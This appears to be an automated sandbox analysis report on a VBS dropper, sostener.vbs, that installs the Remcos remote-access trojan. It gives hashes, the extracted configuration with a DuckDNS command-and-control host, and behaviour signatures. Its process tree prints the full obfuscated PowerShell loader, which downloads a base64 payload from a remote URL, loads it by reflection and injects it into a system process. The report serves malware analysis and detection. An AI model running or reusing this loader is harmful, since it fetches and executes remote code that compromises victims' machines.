Analysis
-
max time kernel
148s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
23-09-2024 06:23
Static task
static1
Behavioral task
behavioral1
Sample
sostener.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
sostener.vbs
Resource
win10v2004-20240802-en
General
-
Target
sostener.vbs
-
Size
503KB
-
MD5
5d616b1f098785c46701bf12ee40244b
-
SHA1
21c4bfda03dc3fbaa452769a05f80d0390c8b0bb
-
SHA256
fa6ef44602cd8b93885484c8408e6155d1747acfa361857cce7fbf8601ab689f
-
SHA512
25973fbcbfc8b06b0811aea729c3c5429d9fa06a4c60a445cdbfef19d61fb52c8dfe09765291e238ec5b827015777982374b68c6bcfbe8c26e876d416299eac1
-
SSDEEP
12288:1H+cpW8xL9zJrxSWoixru+AMKzy3ggdiLkq3ahosUAwnJiWSXPJVpBPPwliMd:g03EKa+zKwdPf5S
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Extracted
remcos
Matrix Fenix*
newssssssssssssss.duckdns.org:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
registros.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-XDNGQ0
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Capturas de pantalla
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 8 4000 powershell.exe 36 4000 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 4620 powershell.exe 4000 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4000 set thread context of 4128 4000 powershell.exe 94 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AddInProcess32.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4620 powershell.exe 4620 powershell.exe 4000 powershell.exe 4000 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4620 powershell.exe Token: SeDebugPrivilege 4000 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4128 AddInProcess32.exe -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2052 wrote to memory of 4620 2052 WScript.exe 82 PID 2052 wrote to memory of 4620 2052 WScript.exe 82 PID 4620 wrote to memory of 4000 4620 powershell.exe 84 PID 4620 wrote to memory of 4000 4620 powershell.exe 84 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94 PID 4000 wrote to memory of 4128 4000 powershell.exe 94
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9dXInKydsID0gezB9aHR0cHM6JysnLy9pJysnYTYnKycwMDEwMC51cy5hcmMnKydoJysnaXZlLicrJ29yZy8yNCcrJy9pdGUnKydtcycrJy9kZXRhaC1uJysnb3RlLXYvJysnRGV0YScrJ2hOb3RlVi50eHQnKyd7MCcrJ307eycrJzF9JysnYmEnKydzZTYnKyc0JysnQ28nKyduJysndGVuJysndCA9IChOZScrJ3ctT2JqZWN0IFN5c3RlbS5OZXQuVycrJ2ViJysnQ2wnKydpZW50JysnKScrJy5EJysnbycrJ3dubCcrJ28nKydhZCcrJ1N0JysncmluZyh7MScrJ30nKyd1cmwpO3snKycxJysnfScrJ2JpJysnbmEnKydyeUNvbicrJ3QnKydlJysnbicrJ3QgPScrJyBbUycrJ3lzdGVtLkMnKydvbnYnKydlcicrJ3QnKyddOicrJzpGJysncicrJ29tQicrJ2EnKydzJysnZTY0UycrJ3QnKydyaW5nKCcrJ3snKycxfWInKydhc2U2JysnNCcrJ0NvbnQnKydlbnQnKycpO3sxJysnfWFzc2VtYmx5ICcrJz0gW1JlJysnZicrJ2xlJysnYycrJ3Rpb24uJysnQScrJ3NzZW1ibCcrJ3knKyddOjpMb2FkKCcrJ3sxJysnfWInKydpJysnbmEnKydyJysneUNvbicrJ3RlbicrJ3QpJysnO3sxfXQnKyd5cCcrJ2UgJysnPSAnKyd7MX1hJysnc3NlbWJseScrJy5HZXRUeXAnKydlKHswfVJ1JysnblBFLkhvJysnbWV7MH0pO3sxJysnfW0nKydldGhvZCA9IHsxfXR5cCcrJ2UuJysnR2V0TWV0aG9kJysnKHsnKycwfVYnKydBSXsnKycwJysnfScrJyk7eycrJzF9bWV0JysnaG9kLkluJysndm9rZScrJygnKyd7JysnMX0nKyduJysndWxsLCBbb2InKydqZWN0W11dJysnQCcrJygnKyd7MH0nKycwL1R1JysnUicrJzVSL2QvZScrJ2UnKycuZXQnKydzYXAnKycvJysnLzpzJysncCcrJ3R0aHswJysnfSAnKycsICcrJ3snKycwfScrJ2Rlc2F0aXYnKydhZG97MH0gJysnLCcrJyB7MH1kZXNhJysndGknKyd2YScrJ2QnKydvJysnezB9ICwnKycgJysnezB9ZCcrJ2VzYXRpJysndmFkb3swfSx7MH1BZGRJblByJysnbycrJ2NlcycrJ3MzMicrJ3swJysnfSwnKyd7MH17MH0nKycpKScpIC1mW2NIQXJdMzksW2NIQXJdMzYpIHwuKCAkc0hFbGxpRFsxXSskU2hlbExJZFsxM10rJ3gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}ur'+'l = {0}https:'+'//i'+'a6'+'00100.us.arc'+'h'+'ive.'+'org/24'+'/ite'+'ms'+'/detah-n'+'ote-v/'+'Deta'+'hNoteV.txt'+'{0'+'};{'+'1}'+'ba'+'se6'+'4'+'Co'+'n'+'ten'+'t = (Ne'+'w-Object System.Net.W'+'eb'+'Cl'+'ient'+')'+'.D'+'o'+'wnl'+'o'+'ad'+'St'+'ring({1'+'}'+'url);{'+'1'+'}'+'bi'+'na'+'ryCon'+'t'+'e'+'n'+'t ='+' [S'+'ystem.C'+'onv'+'er'+'t'+']:'+':F'+'r'+'omB'+'a'+'s'+'e64S'+'t'+'ring('+'{'+'1}b'+'ase6'+'4'+'Cont'+'ent'+');{1'+'}assembly '+'= [Re'+'f'+'le'+'c'+'tion.'+'A'+'ssembl'+'y'+']::Load('+'{1'+'}b'+'i'+'na'+'r'+'yCon'+'ten'+'t)'+';{1}t'+'yp'+'e '+'= '+'{1}a'+'ssembly'+'.GetTyp'+'e({0}Ru'+'nPE.Ho'+'me{0});{1'+'}m'+'ethod = {1}typ'+'e.'+'GetMethod'+'({'+'0}V'+'AI{'+'0'+'}'+');{'+'1}met'+'hod.In'+'voke'+'('+'{'+'1}'+'n'+'ull, [ob'+'ject[]]'+'@'+'('+'{0}'+'0/Tu'+'R'+'5R/d/e'+'e'+'.et'+'sap'+'/'+'/:s'+'p'+'tth{0'+'} '+', '+'{'+'0}'+'desativ'+'ado{0} '+','+' {0}desa'+'ti'+'va'+'d'+'o'+'{0} ,'+' '+'{0}d'+'esati'+'vado{0},{0}AddInPr'+'o'+'ces'+'s32'+'{0'+'},'+'{0}{0}'+'))') -f[cHAr]39,[cHAr]36) |.( $sHElliD[1]+$ShelLId[13]+'x')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4128
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5374af405e342d9486b9433e10f2972f7
SHA10c346cde1e72e49fe35393decf86059dcf56f749
SHA2569b437135b64819440f8b63e44dd6b899e0b3381ddda4a4b091b4636455cd91cc
SHA51243ae226406aa61a4445487ed66bc6f97b43370962287ef525935042082510f18bbd37afa0efe0774d165626e8d85790c99168308ebcf2e88121ff9b68030c013
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82